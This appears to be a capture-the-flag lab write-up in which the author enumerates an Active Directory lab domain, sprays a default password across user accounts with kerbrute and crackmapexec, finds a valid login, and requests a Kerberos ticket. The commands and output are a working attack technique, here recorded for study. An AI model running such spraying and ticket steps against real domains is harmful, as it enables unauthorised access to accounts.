InfoSec LAB

Resolute_Password_Spray

Created: 3 min read

Default Credential

I discovered that the target system has a broken access control across different services such as MSRPC and LDAP services. While this allowed me to gain an initial oversight about the target domain through those services, I had more success with the MSRPC server as it also provides the target’s system information alongside the domain.

While I was checking individual user data, I found out that one of the user, marko, has a CLEARTEXT password hard-coded into the Description attribute. I will attempt to validate the credential here.

┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ impacket-gettgt 'megabank.local/marko:Welcome123!' -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
kerberos sessionerror: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)

It fails.

While the validation failure seems a deadend, there is an easy-to-miss important point

It also mentions “Account Created” as if it was automated. It is very much possible that Welcome123! could be the default password for new users in the target domain

If that is the case, I can attempt the password spray attack

Password Spray

┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ kerbrute passwordspray --dc resolute.megabank.local -d MEGABANK.LOCAL users 'Welcome123!'
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 06/10/23 - Ronnie Flathers @ropnop
 
2023/06/10 18:29:57 >  Using KDC(s):
2023/06/10 18:29:57 >  	resolute.megabank.local:88
 
2023/06/10 18:29:58 >  Done! Tested 27 logins (0 successes) in 0.605 seconds
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ cme smb $IP -d MEGABANK.LOCAL -u users -p 'Welcome123!' --continue-on-success
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\Administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] MEGABANK.LOCAL\melanie:Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\zach:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\simon:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\naoki:Welcome123! STATUS_LOGON_FAILURE

While it failed with Kerbrute, it went through with crackmapexec against the target SMB server The password belongs to the melanie user

I will confirm it again.

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ impacket-gettgt 'megabank.local/melanie:Welcome123!' -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in melanie.ccache

Confirmed and TGT created for a better OPSEC with thepass_the_ticket technique Now that I have a valid domain credential, it opens up a whole wider enumeration surface. I’ll start with ldapdomaindump

Interactive Graph View

Backlinks